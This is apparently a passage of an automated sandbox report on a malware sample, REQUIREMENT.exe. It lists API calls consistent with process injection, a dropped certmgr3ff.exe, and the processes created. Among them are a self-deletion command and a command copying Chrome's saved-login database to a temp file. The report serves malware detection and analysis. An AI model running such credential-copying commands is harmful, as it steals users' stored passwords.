Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6365 NtWriteVirtualMemory,	25_2_022C6365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C637D NtWriteVirtualMemory,	25_2_022C637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6179 NtWriteVirtualMemory,	25_2_022C6179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C694D NtWriteVirtualMemory,	25_2_022C694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6745 NtWriteVirtualMemory,	25_2_022C6745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6941 NtWriteVirtualMemory,	25_2_022C6941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C675D NtWriteVirtualMemory,	25_2_022C675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6959 NtWriteVirtualMemory,	25_2_022C6959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C635B NtWriteVirtualMemory,	25_2_022C635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6155 NtWriteVirtualMemory,	25_2_022C6155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6751 NtWriteVirtualMemory,	25_2_022C6751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65BD NtWriteVirtualMemory,	25_2_022C65BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65B1 NtWriteVirtualMemory,	25_2_022C65B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6389 NtWriteVirtualMemory,	25_2_022C6389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6185 NtWriteVirtualMemory,	25_2_022C6185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6395 NtWriteVirtualMemory,	25_2_022C6395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65E1 NtWriteVirtualMemory,	25_2_022C65E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BF5 NtWriteVirtualMemory,	25_2_022C6BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65C9 NtWriteVirtualMemory,	25_2_022C65C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BC5 NtWriteVirtualMemory,	25_2_022C6BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BDD NtWriteVirtualMemory,	25_2_022C6BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65D5 NtWriteVirtualMemory,	25_2_022C65D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6BD1 NtWriteVirtualMemory,	25_2_022C6BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	26_2_1E9C2DC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2D10 NtQuerySystemInformation,LdrInitializeThunk,	26_2_1E9C2D10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B90 NtFreeVirtualMemory,LdrInitializeThunk,	26_2_1E9C2B90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	26_2_1E9C2B10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C34E0 NtCreateMutant,LdrInitializeThunk,	26_2_1E9C34E0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2E80 NtCreateProcessEx,	26_2_1E9C2E80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2EB0 NtProtectVirtualMemory,	26_2_1E9C2EB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2ED0 NtResumeThread,	26_2_1E9C2ED0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2EC0 NtQuerySection,	26_2_1E9C2EC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2E00 NtQueueApcThread,	26_2_1E9C2E00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2E50 NtCreateSection,	26_2_1E9C2E50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2FB0 NtSetValueKey,	26_2_1E9C2FB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2F00 NtCreateFile,	26_2_1E9C2F00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2F30 NtOpenDirectoryObject,	26_2_1E9C2F30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C3C90 NtOpenThread,	26_2_1E9C3C90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2CD0 NtEnumerateKey,	26_2_1E9C2CD0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2CF0 NtDelayExecution,	26_2_1E9C2CF0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C10 NtOpenProcess,	26_2_1E9C2C10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C3C30 NtOpenProcessToken,	26_2_1E9C3C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C30 NtMapViewOfSection,	26_2_1E9C2C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C20 NtSetInformationFile,	26_2_1E9C2C20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2C50 NtUnmapViewOfSection,	26_2_1E9C2C50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2DA0 NtReadVirtualMemory,	26_2_1E9C2DA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2D50 NtWriteVirtualMemory,	26_2_1E9C2D50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2A80 NtClose,	26_2_1E9C2A80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2AA0 NtQueryInformationFile,	26_2_1E9C2AA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2AC0 NtEnumerateValueKey,	26_2_1E9C2AC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2A10 NtWriteFile,	26_2_1E9C2A10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B80 NtCreateKey,	26_2_1E9C2B80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2BC0 NtQueryInformationToken,	26_2_1E9C2BC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2BE0 NtQueryVirtualMemory,	26_2_1E9C2BE0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B00 NtQueryValueKey,	26_2_1E9C2B00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C2B20 NtQueryInformationProcess,	26_2_1E9C2B20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C38D0 NtGetContextThread,	26_2_1E9C38D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C29D0 NtWaitForSingleObject,	26_2_1E9C29D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C29F0 NtReadFile,	26_2_1E9C29F0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C4570 NtSuspendThread,	26_2_1E9C4570
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_1E9C4260 NtSetContextThread,	26_2_1E9C4260
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_0056244F NtProtectVirtualMemory,	26_2_0056244F
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_0056B688 NtProtectVirtualMemory,	26_2_0056B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 26_2_005676AD NtAllocateVirtualMemory,	26_2_005676AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	27_2_1E9D2DC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2D10 NtQuerySystemInformation,LdrInitializeThunk,	27_2_1E9D2D10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	27_2_1E9D2B90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	27_2_1E9D2B10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D34E0 NtCreateMutant,LdrInitializeThunk,	27_2_1E9D34E0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2E80 NtCreateProcessEx,	27_2_1E9D2E80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2EB0 NtProtectVirtualMemory,	27_2_1E9D2EB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2ED0 NtResumeThread,	27_2_1E9D2ED0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2EC0 NtQuerySection,	27_2_1E9D2EC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2E00 NtQueueApcThread,	27_2_1E9D2E00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2E50 NtCreateSection,	27_2_1E9D2E50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2FB0 NtSetValueKey,	27_2_1E9D2FB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2F00 NtCreateFile,	27_2_1E9D2F00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2F30 NtOpenDirectoryObject,	27_2_1E9D2F30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D3C90 NtOpenThread,	27_2_1E9D3C90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2CD0 NtEnumerateKey,	27_2_1E9D2CD0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2CF0 NtDelayExecution,	27_2_1E9D2CF0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C10 NtOpenProcess,	27_2_1E9D2C10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C30 NtMapViewOfSection,	27_2_1E9D2C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D3C30 NtOpenProcessToken,	27_2_1E9D3C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C20 NtSetInformationFile,	27_2_1E9D2C20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2C50 NtUnmapViewOfSection,	27_2_1E9D2C50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2DA0 NtReadVirtualMemory,	27_2_1E9D2DA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2D50 NtWriteVirtualMemory,	27_2_1E9D2D50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2A80 NtClose,	27_2_1E9D2A80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2AA0 NtQueryInformationFile,	27_2_1E9D2AA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2AC0 NtEnumerateValueKey,	27_2_1E9D2AC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2A10 NtWriteFile,	27_2_1E9D2A10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B80 NtCreateKey,	27_2_1E9D2B80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2BC0 NtQueryInformationToken,	27_2_1E9D2BC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2BE0 NtQueryVirtualMemory,	27_2_1E9D2BE0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B00 NtQueryValueKey,	27_2_1E9D2B00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D2B20 NtQueryInformationProcess,	27_2_1E9D2B20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D38D0 NtGetContextThread,	27_2_1E9D38D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D29D0 NtWaitForSingleObject,	27_2_1E9D29D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D29F0 NtReadFile,	27_2_1E9D29F0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D4570 NtSuspendThread,	27_2_1E9D4570
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_1E9D4260 NtSetContextThread,	27_2_1E9D4260
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_0056244F NtProtectVirtualMemory,	27_2_0056244F
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_0056B688 NtProtectVirtualMemory,	27_2_0056B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 27_2_005676AD NtAllocateVirtualMemory,	27_2_005676AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	28_2_1E9C2DC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2D10 NtQuerySystemInformation,LdrInitializeThunk,	28_2_1E9C2D10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B90 NtFreeVirtualMemory,LdrInitializeThunk,	28_2_1E9C2B90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	28_2_1E9C2B10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C34E0 NtCreateMutant,LdrInitializeThunk,	28_2_1E9C34E0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2E80 NtCreateProcessEx,	28_2_1E9C2E80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2EB0 NtProtectVirtualMemory,	28_2_1E9C2EB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2ED0 NtResumeThread,	28_2_1E9C2ED0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2EC0 NtQuerySection,	28_2_1E9C2EC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2E00 NtQueueApcThread,	28_2_1E9C2E00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2E50 NtCreateSection,	28_2_1E9C2E50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2FB0 NtSetValueKey,	28_2_1E9C2FB0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2F00 NtCreateFile,	28_2_1E9C2F00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2F30 NtOpenDirectoryObject,	28_2_1E9C2F30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C3C90 NtOpenThread,	28_2_1E9C3C90
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2CD0 NtEnumerateKey,	28_2_1E9C2CD0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2CF0 NtDelayExecution,	28_2_1E9C2CF0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C10 NtOpenProcess,	28_2_1E9C2C10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C3C30 NtOpenProcessToken,	28_2_1E9C3C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C30 NtMapViewOfSection,	28_2_1E9C2C30
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C20 NtSetInformationFile,	28_2_1E9C2C20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2C50 NtUnmapViewOfSection,	28_2_1E9C2C50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2DA0 NtReadVirtualMemory,	28_2_1E9C2DA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2D50 NtWriteVirtualMemory,	28_2_1E9C2D50
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2A80 NtClose,	28_2_1E9C2A80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2AA0 NtQueryInformationFile,	28_2_1E9C2AA0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2AC0 NtEnumerateValueKey,	28_2_1E9C2AC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2A10 NtWriteFile,	28_2_1E9C2A10
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B80 NtCreateKey,	28_2_1E9C2B80
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2BC0 NtQueryInformationToken,	28_2_1E9C2BC0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2BE0 NtQueryVirtualMemory,	28_2_1E9C2BE0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B00 NtQueryValueKey,	28_2_1E9C2B00
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C2B20 NtQueryInformationProcess,	28_2_1E9C2B20
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C38D0 NtGetContextThread,	28_2_1E9C38D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C29D0 NtWaitForSingleObject,	28_2_1E9C29D0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C29F0 NtReadFile,	28_2_1E9C29F0
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C4570 NtSuspendThread,	28_2_1E9C4570
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_1E9C4260 NtSetContextThread,	28_2_1E9C4260
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_0056244F NtProtectVirtualMemory,	28_2_0056244F
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_0056B688 NtProtectVirtualMemory,	28_2_0056B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 28_2_005676AD NtAllocateVirtualMemory,	28_2_005676AD

Abnormal high CPU Usage

Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\explorer.exe	Process Stats: CPU usage > 98%

Sample file is different than original file name gathered from version info

Source: REQUIREMENT.exe, 00000001.00000000.32469356192.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStablerne.exe vs REQUIREMENT.exe
Source: REQUIREMENT.exe, 00000003.00000002.33045942706.00000000000D3000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs REQUIREMENT.exe
Source: REQUIREMENT.exe, 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs REQUIREMENT.exe
Source: REQUIREMENT.exe, 00000003.00000000.32662741208.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameStablerne.exe vs REQUIREMENT.exe
Source: REQUIREMENT.exe	Binary or memory string: OriginalFilenameStablerne.exe vs REQUIREMENT.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: edgegdi.dll

Source: REQUIREMENT.exe

ReversingLabs: Detection: 48%

Source: REQUIREMENT.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\REQUIREMENT.exe 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process created: C:\Users\user\Desktop\REQUIREMENT.exe 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process created: C:\Users\user\Desktop\REQUIREMENT.exe 'C:\Users\user\Desktop\REQUIREMENT.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Jump to behavior
